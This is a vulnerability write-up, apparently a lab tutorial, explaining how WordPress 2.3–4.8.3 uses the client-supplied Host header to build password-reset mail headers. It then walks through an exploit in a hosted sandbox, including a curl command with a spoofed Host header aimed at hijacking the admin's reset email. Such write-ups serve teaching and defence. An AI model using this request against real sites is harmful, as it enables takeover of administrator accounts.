WordPress is the most widely used content management system nowadays. According to w3tech statistics, around 30% of the world's Web sites are based on WordPress.
WordPress 2.3-4.8.3 password reset function directly uses the HTTP_HOST as part of the password reset mail's header, which can be exploited by an attacker to steal the content of the password reset mail.
In this article, we will use VulnSpy's online WordPress environment to demonstrate the exploit of this vulnerability.
ANALYSIS
In WordPress, the wp_mail ()
function is used to send mail, and if the From
address is not set during the sending process, the '[email protected]' + $_SERVER ['SERVER_NAME']
will be used as the From address
of the mail. In most Web servers, the SERVER_NAME
variable comes from the HTTP_HOST
header in the client request, which means that the From
address is user-controlled.
The declaration of function wp_mail()
is in file WordPress/wp-includes/pluggable.php :
function wp_mail( $to, $subject, $message, $headers = '', $attachments = array() ) {
...//ignore
if ( !isset( $from_email ) ) {
// Get the site domain and get rid of www.
$sitename = strtolower( $_SERVER['SERVER_NAME'] );
if ( substr( $sitename, 0, 4 ) == 'www.' ) {
$sitename = substr( $sitename, 4 );
}
$from_email = '[email protected]' . $sitename;
}
/**
* Filters the email address to send from.
*
* @since 2.2.0
*
* @param string $from_email Email address to send from.
*/
$from_email = apply_filters( 'wp_mail_from', $from_email );
/**
* Filters the name to associate with the "from" email address.
*
* @since 2.3.0
*
* @param string $from_name Name associated with the "from" email address.
*/
$from_name = apply_filters( 'wp_mail_from_name', $from_name );
$phpmailer->setFrom( $from_email, $from_name );
...//ignore
}
In some cases, the mail server will directly use the From address
as Return-Path
. And when the sending mail fails, the message will be forwarded to the Return-Path
address automatically. In WordPress, password reset mail can be sent to a malicious mail server because the From Address
is user-controlled.
EXPLOIT
1. Click the START TO HACK
button on the top right side of the page, and use VSPlate to create online environment (automatically).
2. Install WordPress
Note: The administrator e-mail address here is set to a nonexistent e-mail address [email protected]
, which simulates a DNS/DOS attack that causes administrators to fail to send password-reset mail.
3. Log into VSPlate Online Terminal
4. Create an email account like [email protected]
Note: yourdomain.com
is your own domain name. You can use the free enterprise email to set e-mail addresses. We use [email protected]
in the demonstration.
5. Send password reset requests via the online terminal and modifies the HTTP_HOST header.
We use the online terminal to simulate the attack on the WordPress
website of the intranet.
Run command in online terminal:
curl -v 'http://127.0.0.1/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'
If the sending mail fails, the message will be forwarded to [email protected]
automatically. That is to say, the mail to send the administrator [email protected]
will be sent to [email protected]
.
6. Using [email protected]
to receive mail
If successful, [email protected]
will receive a password reset mail.
7. Reset Password